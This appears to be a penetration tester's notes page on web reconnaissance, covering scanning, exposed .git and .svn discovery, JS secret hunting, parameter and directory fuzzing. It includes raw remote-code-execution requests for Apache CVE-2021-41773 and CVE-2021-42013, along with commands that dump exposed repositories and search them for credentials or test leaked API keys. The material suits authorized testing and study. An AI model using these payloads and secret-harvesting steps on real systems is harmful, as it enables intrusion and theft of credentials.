Recon
Also check for other exposed ports. Ex: 22, look for regreSSHion (CVE-2024-6387), etc. See Protocols
nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list
EyeWitness or Aquatone - See Information Gathering
SSL
HTTP/2 - DoS
Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487
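A quick first pass (target URL is a placeholder) is to confirm the server even negotiates HTTP/2 before chasing CVE-2023-44487:
# Print the negotiated HTTP version; "2" means HTTP/2 is enabled
curl -skI --http2 -o /dev/null -w '%{http_version}\n' https://target.example/
Follow up with a dedicated Rapid Reset checker, since HTTP/2 support alone does not prove the DoS is exploitable.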
HTTP Methods
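For a quick manual check (hypothetical target shown), read the Allow header from an OPTIONS request or let nmap enumerate methods per path:
# Allowed verbs advertised by the server
curl -sk -i -X OPTIONS https://target.example/ | grep -i '^Allow:'
# Per-path method enumeration
nmap -p 80,443 --script http-methods target.example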
Apache Vulnerability Testing
CVE-2021-41773 (RCE and LFI)
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close
echo;id
CVE-2021-42013 (RCE and LFI)
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
echo;id
Common files
/.git
/.gitkeep
/.git-rewrite
/.gitreview
/.git/HEAD
/.gitconfig
/.git/index
/.git/logs
/.svnignore
/.gitattributes
/.gitmodules
/.svn/entries
robots.txt
-> robofinder: search for and retrieve historical robots.txt files from Archive.org for any given website.
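The same history can also be pulled straight from the Wayback CDX API without installing anything (example.com is a placeholder):
# List archived robots.txt snapshots (timestamp + original URL), one per unique capture
curl -sG "https://web.archive.org/cdx/search/cdx" \
  --data-urlencode "url=example.com/robots.txt" \
  --data-urlencode "output=text" \
  --data-urlencode "fl=timestamp,original" \
  --data-urlencode "collapse=digest"
# Then fetch a specific snapshot: https://web.archive.org/web/<timestamp>/https://example.com/robots.txt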
.git
.svn
.DS_Store
# python ds_store_exp.py http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/JS/.DS_Store
[200] http://10.13.X.X/Images/.DS_Store
[200] http://10.13.X.X/dev/.DS_Store
<--SNIP-->
Misconfigurations on popular third-party services
Git Exposed
Nuclei Template: https://github.com/coffinxp/priv8-Nuclei/blob/main/git-exposed.yaml
id: git-exposed

info:
  name: Exposed Git Repository
  author: kaks3c
  severity: medium
  description: |
    Checks for exposed Git repositories by making requests to potential Git repository paths.
  tags: p3,logs,git

http:
  - raw:
      - |
        GET {{BaseURL}}{{path}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Connection: close

    attack: pitchfork
    payloads:
      path:
        - /.git/
        - /.git/HEAD
        - /.git/config
        - /.git/logs/HEAD
        - /.git/logs/
        - /.git/description
        - /.git/refs/heads/
        - /.git/refs/remotes/
        - /.git/objects/

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "commit (initial): Initial commit" #/.git/logs/HEAD
          - "ref: refs/heads/" #/.git/HEAD
          - "logallrefupdates = true" #/.git/config
          - "repositoryformatversion = 0" #/.git/config
          - "Index of /" #/.git/
          - "You do not have permission to access /.git/" #403_/.git
          - "Unnamed repository; edit this file 'description' to name the repository" #/.git/description
      - type: regex
        regex:
          - "info/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
          - "pack/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
          - "master/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/heads/
          - "origin/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/remotes/
          - "refs/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/logs/
    stop-at-first-match: true
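A typical run of the template above (list file and output name are arbitrary):
nuclei -t git-exposed.yaml -l web_hosts.txt -o git-exposed-results.txt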
.git found => download the target .git folder
wget -r -np -nH --cut-dirs=1 -R "index.html*" http://dev.dumpme.htb/.git/
Or with tools:
$ git clone https://github.com/deletescape/goop
$ cd goop
$ go build
$ ./goop http://dev.dumpme.htb
After that, search for creds, etc:
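For example, a minimal sketch run inside the dumped repository:
git checkout -- .        # rebuild the working tree from the dumped objects
git log --oneline --all  # review commit history for interesting changes
# Grep every commit for likely secrets
git grep -iE 'passw|secret|api[_-]?key|token' $(git rev-list --all)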
SVN Exposed
./svn-extractor.py --url http://url.com --match database.php
PHPMyAdmin
target[.]com/phpmyadmin/setup/index.php ==> 301 to login page
target[.]com/phpMyAdmin/setup/index.php ==> 200 to phpMyAdmin setup
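A quick way to test both casings at once (target.example is a placeholder):
for p in phpmyadmin phpMyAdmin; do
  printf '%s => ' "$p"
  curl -sk -o /dev/null -w '%{http_code}\n' "https://target.example/$p/setup/index.php"
done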
WSAAR
OWASP Noir
$ noir -b . -u http://example.com
$ noir -b . -u http://example.com --passive-scan
Wayback Machine
# RECON METHOD BY ~/.COFFINXP
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Backup Files
ffuf -w subdomains.txt:SUB -w payloads/backup_files_only.txt:FILE -u https://SUB/FILE -mc 200 -rate 50 -fs 0 -c -x http://localip:8080
Fuzzuli
echo http://target.com | fuzzuli -p
Burp Extension
Archived Backups
Look for metadata
Extract URLs and paths from web pages
Manually
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
Open the console (Ctrl + Shift + I), allow pasting if prompted ("allow pasting"), then copy-paste the JS code; alternatively, save it as a bookmarklet and click it.
Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA
Gourlex
gourlex -t domain.com
xnLinkFinder
xnLinkFinder -i bugcrowd.com -sp https://www.bugcrowd.com -sf "bugcrowd.*" -d 2 -v
Command breakdown:
-i bugcrowd.com → Target domain
-sp https://www.bugcrowd.com → Scope prefix
-sf "bugcrowd.*" → Scope filter
-d 2 → Crawl depth
-v → Verbose output
See also: https://github.com/mhmdiaa/chronos
Hakrawler
echo https://google.com | hakrawler
Waybackurls
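Typical usage (domain fed via stdin):
echo example.com | waybackurls | tee wayback_urls.txt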
Katana & Urlfinder
katana -u https://tesla.com
urlfinder -d tesla.com
GetAllURL - gau
gau https://target.com
LinkFinder
python3 linkfinder.py -i https://example.com/app.js
$ python linkfinder.py -i 'js/*' -o result.html
$ python linkfinder.py -i 'js/*' -o cli
LazyEgg
ReconSpider
See Fingerprinting / Crawling
Metadata
JS Files
Sensitive JS Files
ffuf -w subdomains.txt:SUB -w payloads/senstivejs.txt:FILE -u https://SUB/FILE -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -fs 0 -c -mc 200 -fr false -rate 10 -t 10
/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js
/js/policies.js
/js/permissions.js
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js
Burp
Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA
Detect secrets
./trufflehog filesystem ~/Downloads/js --no-verification --include-detectors="all"
Burp Extension
Code Analysis
semgrep scan --config auto
JSFScan.sh
1 - Gather Jsfile Links from different sources.
2 - Import File Containing JSUrls
3 - Extract Endpoints from Jsfiles
4 - Find Secrets from Jsfiles
5 - Get Jsfiles store locally for manual analysis
6 - Make a Wordlist from Jsfiles
7 - Extract Variable names from jsfiles for possible XSS.
8 - Scan JsFiles For DomXSS.
9 - Generate Html Report.
bash JSFScan.sh -l target.txt --all -r -o outputdir
Morgan
Identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites
GetJS
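A minimal sketch (--complete resolves relative script paths into full URLs):
getJS --url https://example.com --complete
cat live_hosts.txt | getJS --complete --output js_urls.txt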
JSHunter
Endpoint Extraction and Sensitive Data Detection
cat urls.txt | grep "\.js" | jshunter
Javascript Deobfuscator
Online
API Endpoint in JS File
cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
JSNinja
JS Link Finder
Jsluice
Sensitive data in JS Files
Top 25 JavaScript path files used to store sensitive information
/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js
/js/policies.js
/js/permissions.js
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js
JS Miner - Burp Extension
X-Keys - Burp Extension
jsluice++ - Burp Extension
SecretFinder
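Minimal run against a single JS file, printing findings to the terminal:
python3 SecretFinder.py -i https://example.com/app.js -o cli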
Mantra
Testing API Key
Google Maps API Key
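A common manual check is to replay the leaked key against a billable endpoint such as the Geocoding API (YOUR_LEAKED_KEY is a placeholder); anything other than REQUEST_DENIED suggests the key is usable:
curl -s "https://maps.googleapis.com/maps/api/geocode/json?address=test&key=YOUR_LEAKED_KEY"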
Hidden Parameter
This useful option in Burp Suite makes every hidden input field (often pointing to a hidden parameter) visible:
Proxy Settings >>> Response modification rules >>> Unhide hidden form fields
Parameter fuzzing
x8
Hidden parameters discovery
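Example run (the SecLists wordlist path is an assumption; any parameter-name list works):
x8 -u "https://example.com/" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt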
Arjun
$ python3 /opt/Arjun/arjun.py -u http://target_address.com
$ python3 /opt/Arjun/arjun.py -u http://target_address.com -o arjun_results.json
If you’ve been proxying traffic with Burp Suite, you can select all URLs within the sitemap, use the Copy Selected URLs option, and paste that list into a text file. Then run Arjun against all Burp Suite targets simultaneously, like this:
$ python3 /opt/Arjun/arjun.py -i burp_targets.txt
Parmahunter
Wordlists
Common extensions: raft-[ small | medium | large ]-extensions.txt from SecLists Web-Content
cewl -m5 --lowercase -w wordlist.txt http://192.168.10.10
Fuzz using different HTTP methods
ffuf -u https://api.example.com/PATH -X METHOD -w /path/to/wordlist:PATH -w /path/to/http_methods:METHOD
Admin interfaces
Backups
Config files
SQL files
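One way to sweep for the four categories above in a single ffuf run (wordlist path and extension set are assumptions):
ffuf -u https://target.example/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -e .bak,.old,.zip,.sql,.conf,.config -mc 200,301,302,401,403 -c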
Vulnerability Assessment
sudo nmap 10.129.2.28 -p 80 -sV --script vuln
Nmap scan report for 10.129.2.28
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.3.4
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| vulners:
| cpe:/a:apache:http_server:2.4.29:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
Lostfuzzer
Admin interface
CMS
Crawling
Crawl with 2 separate user-agents
Always crawl with 2 separate User-Agent headers, one for desktop and one for mobile devices, and look for response changes!
gospider -s "http://app.example.com" -c 3 --depth 3 --no-redirect --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X..." -o mobile_endpoints.txt
Gospider
Hakrawler
With Burp
With ZAP
sudo snap install zaproxy --classic
Fuzz
Wordlists
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS
Banner grabbing
curl -IL https://www.inlanefreight.com
Tool: https://github.com/FortyNorthSecurity/EyeWitness ; or Aquatone
whatweb 10.10.10.121
whatweb --no-errors 10.10.10.0/24
DNS Subdomain Enumeration
Cloudflare Bypass for Web Scraping